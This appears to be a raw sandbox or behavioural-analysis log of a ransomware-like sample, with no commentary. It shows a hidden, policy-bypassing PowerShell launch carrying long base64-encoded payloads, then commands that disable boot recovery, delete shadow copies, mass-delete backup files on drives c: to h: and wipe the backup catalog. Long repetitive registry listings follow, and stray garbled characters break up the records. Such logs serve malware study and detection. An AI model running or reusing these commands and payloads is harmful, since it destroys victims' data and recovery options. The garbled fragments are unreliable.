wAEoAeQBzAG4ATgBFAGwANABKAHkAcwBuAFIAaQBjAHIASgAwAGsAbgBLAHkAZABvAE0AbQBaAHQASgB5AHMAbgBSADEARgBQAFYAagBGADUASgB5AHMAbgBhAG0AOQBCAFcARgBkAFoASgB5AHMAbgBVAFcAOAB5AEoAeQBzAG4AUwBGAGMAbgBLAHkAZAB0AFYAUwBjAHIASgAwAE0AeABKAHkAcwBuAGMAVwBWAG4AYgBpAGMAcgBKADIAdwA0AFIAMwBOAG4AYQBIAE4AegBKAHkAcwBuAFMAUwBjAHIASgB6AFUAMgBUAEgAUQBuAEsAeQBkAFUAVAAzAFoAUABTAFMAYwByAEoAMQBOAHgASgB5AHMAbgBRAFgAVQBuAEsAeQBkAEQASgB5AHMAbgBWAFgAUQBuAEsAeQBkAFYASgB5AHMAbgBNAFMAYwByAEoAMABGAFIASgB5AHMAbgBQAFQAMQA0AEoAeQBzAG4AZQBUAEkAcABKAHkAcwBuAEwARgB0AHAAVAB5ADQAbgBLAHkAZABEAGIAMAAwAG4ASwB5AGQAdwBVAG0AVQBuAEsAeQBkAHoAVQB5AGMAcgBKADIAawBuAEsAeQBkAFAAVABpADUARABKAHkAcwBuAFQAMgAxAHcAYwBpAGMAcgBKADAAVgBUAGMAMgBsAFAAYgBtADEAUABKAHkAcwBuAFIARwBVAG4ASwB5AGQAZABKAHkAcwBuAE8AagBvAG4ASwB5AGQAawBaAFUATgBQAFQAUwBjAHIASgAxAEIAUwBSAFYATgB6AEoAeQBzAG4ASQBDAGsAbgBLAHkAYwBwAEwARgBzAG4ASwB5AGQAMABSAFgAaABVAEwAbQBWAE8ASgB5AHMAbgBZADAAOQBFAGEAUwBjAHIASgAwADUASABKAHkAcwBuAFgAVABvADYAWQBTAGMAcgBKADMATgBqAFMAVQBrAHAASwBTAGMAcgBKAHkANABuAEsAeQBkAFMASgB5AHMAbgBSAFUARgBFAFYARQA5AEYAYgBrAFEAbwBJAEMAawBuAEsAUwA1AHkAWgBWAEIAcwBRAFUATgBGAEsAQwBkADQAZQBUAEkAbgBMAEYAdAB6AFYASABKAEoAVABrAGQAZABXADAATgBvAFEAWABKAGQATQB6AGsAcABJAEMAawA9ACIADQAKACQAYgA2ACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAHQAZgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQA2ACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABiADYA
䠨W왢Z
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
218
4580
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhADcAPQAiAEsAQwBnAG4ASQBDAGcAZwBUAGkAYwByAEoAMABWADMASgB5AHMAbgBMAFcAOQBpAGEAaQBjAHIASgAyAFYAagBkAEMAQgBUAEoAeQBzAG4AZQBWAE4AMABSAFUAMAB1AFMAVQA4AHUAWQB5AGMAcgBKADIAOQB0AEoAeQBzAG4AVQBIAEkAbgBLAHkAZABGAGMAeQBjAHIASgAxAE4ASgBKAHkAcwBuAGIAMgA0AG4ASwB5AGMAdQBSAEUAVgBHAFQARwBFAG4ASwB5AGQAVQBKAHkAcwBuAFIAWABOAFUAVQBtAFYAQgBUAFMAaABiAFMAVwA4AHUASgB5AHMAbgBiAFcAVgB0AGIAeQBjAHIASgAzAEkAbgBLAHkAZABaAGMAMwBSAHkAUgBVAEYATgBYAFMAQgBiAEoAeQBzAG4AYwAxAGwAegBkAEMAYwByAEoAMABWAE4ATABpAGMAcgBKADIATgBQAGIAbgBaAEYAVQBsAFIAZABPAGoAcABHAGMAawA5AE4AUQBrAEYAegBaAFQAWQBuAEsAeQBjADAASgB5AHMAbgBjADMAUgBTAEoAeQBzAG4AYQBXADUAbgBLAEUASgBYAFQAVQB3AG4ASwB5AGQAWgBlAEcAUgBFAGIAeQBjAHIASgAwAHAAQgBSAEUAbABUAGQAaQBjAHIASgB6AEIAMQBKAHkAcwBuAGUAVQBSAG8AVgBWAEYARgBaAGoAVgBJAGEAagBRAG4ASwB5AGQATwBTAFQARQBuAEsAeQBkAHQAZQBYAGMAbgBLAHkAZABUAFoAQwBjAHIASgAwAGwAcgBKAHkAcwBuAGIAVgBSAGwASgB5AHMAbgBPAFUAOQBoAEoAeQBzAG4ATQAyAGwAWgBaAEMAYwByAEoAMwBBAG4ASwB5AGQAeQBUAHkAYwByAEoAMAA0AG4ASwB5AGMAMwBkAGkAYwByAEoAMABNAG4ASwB5AGMANABWAFMAYwByAEoAMgA0ADAAUwAwADQAbgBLAHkAZAA1AFMAVwBjAG4ASwB5AGQANQBiADAARgBvAGMAQwBjAHIASgAyAG8AbgBLAHkAZAB2AFkAeQBjAHIASgB6AFoAQgBaAGoAUgBTAE4AMgBZAG4ASwB5AGQAeABhAGsASgBvAEoAeQBzAG4AUQAxAEYAWQBWAHoATgB3AEoAeQBzAG4AWQBtAHAAegBMADAAUQA1AGIAagBjAHIAUwBXAGQAYQBNAFgAZABoAGUAWABwAG0AYQBDAGMAcgBKADAAcwA1AFkAbABFAHIATgBGAFkAMgBKAHkAcwBuAGQAMgBOAGsAYgAxAEEAbgBLAHkAZABMAGEAbgBVAG4ASwB5AGQAVQBSAHkAYwByAEoAeQBzADMAUwB6AGMAbgBLAHkAZAB0AEoAeQBzAG4AUwBpAGMAcgBKADEAWgBLAFYAMgB3AG4ASwB5AGMAMgBZAFcANAB2AFUAMwBkAEsASgB5AHMAbgBkAEYAbABtAEoAeQBzAG4AZABsAEUANABNAFUARgBwAFYARQBsAEMASgB5AHMAbgBiAEMAYwByAEoAMgBsAHoASgB5AHMAbgBQAFUASgBYAFQAUwBBAG4ASwB5AGMAcABJAEMAYwByAEoAeQB3AGcAVwAzAE4ANQBjADEAUgBGAFQAUwA1AEoAVAB5ADUARABKAHkAcwBuAFQAMAAwAG4ASwB5AGQAUQBjAGkAYwByAEoAMgBWAFQASgB5AHMAbgBVADAAbABQAGIAaQA1AEQAYgAyADEAdwBVAGkAYwByAEoAMABWAHoAYwAyAGwAUABUAGkAYwByAEoAMAAxAHYASgB5AHMAbgBSAEMAYwByAEoAMgBVAG4ASwB5AGQAZABPAGoAcABrAEoAeQBzAG4AUgBTAGMAcgBKADIATQBuAEsAeQBkAFAAYgBYAEIAeQBaAFgATQBuAEsAeQBkAHoASgB5AHMAbgBLAFUAcwBuAEsAeQBkAEQAZQBDAEIAbQBiAHkAYwByAEoAMQBJAG4ASwB5AGQARgBRAFMAYwByAEoAMgBNAG4ASwB5AGQAbwBJAEMAYwByAEoAMwB0AE8AUgBYAGMAdABiADIASgBxAEoAeQBzAG4AWgBXAE4AMABJAEcAbAB2AEwAaQBjAHIASgAzAE4AMABjAGsAVQBuAEsAeQBkAEIAYgBTAGMAcgBKADEASgBGAFEAVQBSAEYASgB5AHMAbgBjAGkAZwBnAGQARwBRAG4ASwB5AGQAVgBYAHkAeABiAFUAMQBrAG4ASwB5AGQAVABKAHkAcwBuAFYARQBVAG4ASwB5AGQATgBMAG4AUgBGAGUARgBRAG4ASwB5AGMAdQBSAFUANABuAEsAeQBkAGoAVAAwAFEAbgBLAHkAZABwAFQAbQBjAG4ASwB5AGQAZABPAGoAcABCAFUAMgBOAEoAUwBTAGsAbgBLAHkAYwBnAEoAeQBzAG4AZgBTAEIATABRADMAZwBnAFoAaQBjAHIASgAyADgAbgBLAHkAZABTAFIAVQBGAGoASgB5AHMAbgBhAEMAQgA3AEkASABSAGsAVgBTAGMAcgBKADEAOAB1AGMAawBWAEIASgB5AHMAbgBSAEYAUQBuAEsAeQBkAFAASgB5AHMAbgBSAFcANABuAEsAeQBkAGsASwBDAEEAbgBLAHkAYwBwAGYAUwBBAG4ASwB5AGMAcABTAHkAYwByAEoAMABNAG4ASwB5AGQANABMAGkAZwBuAEsAeQBjAGcASwBGAHQAegBKAHkAcwBuAFYARgBKAEoAYgBrAGQAZABKAHkAcwBuAGQARwBSAFYAVgBrAFYAeQBRAGkAYwByAEoAMgA4AG4ASwB5AGQAegBSAFMAYwByAEoAMwBCAHkAWgBXAFkAbgBLAHkAZABGAFUAaQBjAHIASgAwAFYAdQBZADAAVQBuAEsAeQBjAHAAVwB6AEUAcwBNAHkAYwByAEoAMQAwAHIAUQBsAGMAbgBLAHkAZABOAEoAeQBzAG4AVwBDAGMAcgBKADAASgBYAEoAeQBzAG4AVABTADEASwBUADIAbAB1AFEAaQBjAHIASgAxAGQATgBKAHkAcwBuAFEAbABjAG4ASwB5AGQATgBKAHkAcwBuAEsAUwBjAHAASQBDADEAUwBaAFgAQgBzAFkAVQBOAGwASQBDAGQATABRADMAZwBuAEwARgB0AGoAUwBFAEYAUwBYAFQARQB5AE4AQwBBAGcATABXAE4AUwBSAFgAQgBNAFEAVwBOAGwASgAwAEoAWABUAFMAYwBzAFcAMgBOAEkAUQBWAEoAZABNAHoAawB0AFUAbQBWAHcAYgBHAEYARABaAFMAQQBnAEsARgB0AGoAUwBFAEYAUwBYAFQARQB4AE4AaQB0AGIAWQAwAGgAQgBVAGwAMAB4AE0ARABBAHIAVwAyAE4ASQBRAFYASgBkAE8ARABVAHAATABGAHQAagBTAEUARgBTAFgAVABNADIASwBTAEIAOABMAGkAQQBvAEkAQwBSAFQAYQBHAFYAcwBiAEcAbABrAFcAegBGAGQASwB5AFIAegBTAEcAVgBzAGIARwBsAGsAVwB6AEUAegBYAFMAcwBuAGUAQwBjAHAAIgANAAoAJABiADcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhADcAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGIANwA=
짎Zď༾䏈�ď༮䏈\
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
219
3752
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
220
4084
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
221
3468
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
222
1340
vssadmin.exe
3468
vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
223
4568
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
224
3636
vssadmin.exe
4568
vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
225
2000
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
226
3544
vssadmin.exe
2000
vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
227
3324
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
228
1692
vssadmin.exe
3324
vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
229
3316
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
230
1820
vssadmin.exe
3316
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
231
3872
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
232
4936
vssadmin.exe
3872
vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
233
3348
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
234
1360
vssadmin.exe
3348
vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
235
840
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
236
4488
vssadmin.exe
840
vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
237
4896
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
238
1088
vssadmin.exe
4896
vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
239
4956
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
240
3980
vssadmin.exe
4956
vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
241
5096
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
242
3372
vssadmin.exe
5096
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\
c:\windows\syswow64\vssadmin.exe
Process
243
4644
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
244
3628
vssadmin.exe
4644
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
245
872
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
246
2640
vssadmin.exe
872
vssadmin.exe
vssadmin Delete Shadows /all /quiet
C:\
c:\windows\syswow64\vssadmin.exe
Process
247
4592
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
248
2676
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
249
2920
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
250
1252
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
251
4996
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
252
4636
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
Process
253
4656
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c wmic shadowcopy delete
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
254
3536
wmic.exe
4656
wmic.exe
wmic shadowcopy delete
C:\
c:\windows\syswow64\wbem\wmic.exe
Opened
Process
258
3432
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c wbadmin delete catalog -quiet
c:\windows\syswow64\cmd.exe
Opened
Opened
Opened
Opened
WinRegistryKey
Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
